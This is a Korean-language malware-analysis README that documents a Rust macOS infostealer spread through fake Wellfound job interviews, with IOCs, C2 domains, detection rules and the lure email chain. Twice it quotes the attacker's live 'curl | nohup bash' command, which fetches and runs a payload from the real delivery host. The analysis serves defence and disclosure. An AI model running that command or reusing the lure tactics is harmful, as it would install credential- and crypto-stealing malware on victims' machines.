
Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer
위협 인텔리전스: Wellfound(이전 AngelList)의 가짜 면접 파이프라인을 통해 전달되는 Rust 기반 macOS 유니버설 바이너리 정보 탈취기입니다. "HyperHive"의 운영자 페르소나 "Felix"는 대상자를 유인하여
macos.hyperhives.net에서 악성 설치 프로그램을 실행하도록 유도했습니다. 이 저장소는 완전한 정적 분석을 문서화합니다: 571개의 암호화된 구성 값 복구, C2 URL, Sentry DSN, 276개의 대상 Chrome 확장 프로그램 ID 포함.
| 샘플 SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 도메인 | cloudproxy.link |
| 전달 도메인 | macos.hyperhives.net |
| 유인 플랫폼 | Wellfound (이전 AngelList) |
| 운영자 페르소나 | "HyperHive"의 "Felix" |
| VirusTotal | 9 / 63 탐지 |
| 분류 | 공개 정보 / IOC 번들 |
| 마지막 업데이트 | 2026년 4월 |
| 파일 | 형식 | 목적 |
|---|---|---|
iocs.txt | 일반 텍스트 | 해시, 도메인, URL, IP, 이메일, Sentry ID — 블록리스트, MISP, OpenCTI에 붙여넣기 |
yara_rules.yar | YARA 4.2+ | 알려진 샘플 해시 매치 + Mach-O에 대한 휴리스틱 문자열 탐지 |
sigma_rules.yml | Sigma | 프록시, DNS 및 프로세스 생성 규칙 — SIEM에 맞게 logsource 조정 |
stix/bundle.json | STIX 2.1 | 지표, 악성코드 SDO, 인프라, ATT&CK 패턴 및 관계를 포함한 기계 판독 가능 CTI 번들 |
attack-navigator-layer.json | ATT&CK 탐색기 | 시각적 기술 커버리지를 위해 ATT&CK 탐색기로 가져오기 |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
## 빠른 시작
샘플을 `sample/installer_binary`로 배치합니다 (해시 확인은 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)를 참조하세요), 그런 다음:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
컴포즈 파일은 network_mode: none, read_only: true를 적용하고 모든 Linux 기능을 제거합니다. 전체 처리 지침은 SECURITY.md를 참조하세요.
Wellfound(이전 AngelList)의 구인 공고가 운영자 페르소나 "Felix"("HyperHive")의 다중 이메일 사회 공학 체인으로 이어졌습니다. 표적의 기술적 배경을 칭찬하고 가짜 면접을 잡은 후, 공격자는 피해자에게 hyperhives.net에서 "제품을 검토"하고 특히 Settings → Diagnostics → Log를 살펴보라고 지시했습니다 — 이는 다음을 실행하기 위한 구실이었습니다.```
curl -s https://macos.hyperhives.net/install | nohup bash &
페이로드는 **8.5 MB Mach-O 유니버설 바이너리**(x86_64 + arm64)이며 Rust로 컴파일되었습니다. 에어갭(air-gapped) Docker 랩과 **570개의 고유 x86_64 헬퍼 루틴**의 CPU 에뮬레이션을 통한 정적 분석으로 **모든 571개 암호화된 구성 값**이 복구되어 다음이 노출되었습니다:
- **C2:** `cloudproxy.link` — 4개의 HTTPS 엔드포인트
- **Sentry (속성 피벗):** `ingest.de.sentry.io`의 org/project ID를 포함한 전체 DSN
- **빌드 식별:** Cargo 사용자 `rootr`, 코드명 `force`, 버전 `9.12.1`
- **대상:** 276개의 Chrome 확장 프로그램 ID (암호화폐 지갑, 비밀번호 관리자, 기업 자격 증명)
전술은 **DPRK 연계 Contagious Interview** 캠페인과 일치합니다 — 합법적인 플랫폼에서의 가짜 채용, 다단계 신뢰 구축, `curl | bash` 전달, Rust macOS 스틸러, 암호화폐 중심의 유출.
---
## 1 — 어떻게 시작되었나
### 유인책: Wellfound의 가짜 면접 제의
공격은 **Wellfound(구 AngelList)의 합법적인 구인 게시글**로 시작되었습니다. 대상자가 지원한 후, 운영자가 **"Felix"** 라는 가상 인물과 회사명 **"HyperHive"** 를 사용하여 다음과 같은 이메일 체인이 이어졌습니다.
**이메일 1** (2026년 4월 4일) — 최초 접촉. "Felix"는 대상자의 이력서와 LinkedIn을 확인했다고 밝히고, 그들의 "Tech Lead"가 진행을 승인했다고 주장하며 대상자의 실제 기술 경험을 구체적으로 언급했습니다. 이메일에는 HyperHive가 "다양한 운영 체제에서 Hyperhives의 데스크톱 버전을 구축 중"이라고 명시되어 있고, UTC+0으로 면접 일정을 잡도록 초대했습니다.
**이메일 2** (2026년 4월 5일) — 후속 일정 조정. 특정 면접 시간(4월 8일 15:00 UTC)을 제안하고 중요한 페이로드 전달 지침을 포함했습니다.
> *"가능하시다면, **설정 → 진단 → 로그**에서 제품 로그를 간략히 살펴봐 주세요. 로그와 그 외 제품 관찰 사항에 대한 간단한 의견을 요청할 수 있습니다. 이는 종종 엔지니어링 경험과 세부 사항에 대한 주의력을 판단하는 좋은 신호가 됩니다."*
이를 통해 대상자는 `https://hyperhives.net`으로 이동하게 되었고, 진단 섹션으로 이동하면 다음이 트리거되었습니다:```
curl -s https://macos.hyperhives.net/install | nohup bash &
명령은 8.5MB Mach-O 유니버설 바이너리를 다운로드하여 실행했습니다. AppleScript를 통해 가짜 macOS 암호 대화상자가 나타났습니다. 암호는 입력되지 않았습니다. 프로세스가 즉시 종료되었고 샘플은 분석을 위해 보존되었습니다.
| 요소 | 세부사항 |
|---|---|
| Platform | Wellfound (AngelList) — 합법적인 구인 게시판 |
| Company name | "HyperHive" (단수) / 도메인 hyperhives.net |
| Persona | "Felix" |
| Contact email | [email protected] |
| Trust building | 실제 대상의 이력서, LinkedIn 및 특정 기술 역량 참조 |
| Pretext | "면접 전에 제품을 검토하세요" |
| Payload trigger | hyperhives.net에서 "설정 → 진단 → 로그 확인" |
| Scheduling | 가짜 면접 일정 (4월 8일 15:00 UTC)으로 긴급성 유지 |
| Multi-step chain | 최소 2일 동안 2통의 이메일 전송 후 페이로드 전달 |